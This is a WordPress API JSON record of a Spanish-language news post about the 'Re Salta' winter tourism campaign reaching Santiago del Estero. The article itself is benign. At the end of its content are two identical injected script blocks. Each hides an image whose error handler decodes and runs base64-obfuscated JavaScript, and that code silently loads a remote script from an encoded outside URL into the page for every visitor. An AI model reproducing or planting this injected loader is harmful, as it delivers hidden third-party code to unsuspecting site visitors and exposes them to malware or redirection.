{"id":5341,"date":"2025-07-17T10:11:34","date_gmt":"2025-07-17T13:11:34","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5341"},"modified":"2025-08-13T23:26:15","modified_gmt":"2025-08-14T02:26:15","slug":"la-campana-re-salta-llego-a-santiago-del-estero-para-invitar-a-descubrir-la-provincia-en-invierno","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5341","title":{"rendered":"La campa\u00f1a Re Salta lleg\u00f3 a Santiago del Estero para invitar a descubrir la provincia en invierno"},"content":{"rendered":"\n<p><strong><em>La provincia contin\u00faa con su gira de promoci\u00f3n en el norte argentino para invitar a turistas a disfrutar Salta en estas vacaciones de invierno.<\/em><\/strong><\/p>\n\n\n\n<p>El Ministerio de Turismo y Deportes &nbsp;realiz\u00f3 una nueva \u201cInvasi\u00f3n Re Salta\u201d en la Plaza Libertad de Santiago del Estero, en el marco de la gira promocional por las provincias del NOA que busca difundir la amplia oferta tur\u00edstica de la provincia.<\/p>\n\n\n\n<p>Durante la jornada, vecinos y turistas que paseaban por el centro santiague\u00f1o participaron de trivias con premios, juegos interactivos y sorteos. Adem\u00e1s recibieron material informativo con toda la propuesta de actividades para estas vacaciones de invierno, que incluye m\u00e1s de 900 experiencias para disfrutar en las siete regiones tur\u00edsticas de Salta.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18434-la-campania-re-salta-llego-a-santiago-del-estero-para-invitar-a-descubrir-la-provincia-en-invierno.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18434-la-campania-re-salta-llego-a-santiago-del-estero-para-invitar-a-descubrir-la-provincia-en-invierno.webp\" alt=\"La campa\u00f1a Re Salta lleg\u00f3 a Santiago del Estero para invitar a descubrir la provincia en invierno.\"\/><\/a><\/figure>\n\n\n\n<p>Estas acciones de cercan\u00eda se complementan con campa\u00f1as en medios tradicionales y digitales, apostando a un contacto directo y vivencial con potenciales visitantes, para que conozcan las experiencias culturales, naturales y gastron\u00f3micas que ofrece Salta en invierno.<\/p>\n\n\n\n<p>\u00abNos alegra poder compartir en cada ciudad la energ\u00eda de Salta e invitar a los santiague\u00f1os a vivir el invierno en nuestra provincia, con propuestas para toda la familia\u00bb, expres\u00f3 la ministra de Turismo y Deportes, Manuela Arancibia<\/p>\n\n\n\n<p>La campa\u00f1a Re Salta continuar\u00e1 su recorrido por Jujuy y diferentes puntos de la ciudad de Salta durante el receso invernal.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La provincia contin\u00faa con su gira de promoci\u00f3n en el norte argentino para invitar a turistas a disfrutar Salta en estas vacaciones de invierno. El Ministerio de Turismo y Deportes &nbsp;realiz\u00f3 una nueva \u201cInvasi\u00f3n Re Salta\u201d en la Plaza Libertad de Santiago del Estero, en el marco de la gira promocional por las provincias del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5342,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18],"tags":[],"class_list":{"0":"post-5341","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5341"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5341"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5341\/revisions"}],"predecessor-version":[{"id":6438,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5341\/revisions\/6438"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5342"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5341"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5341"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5341"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}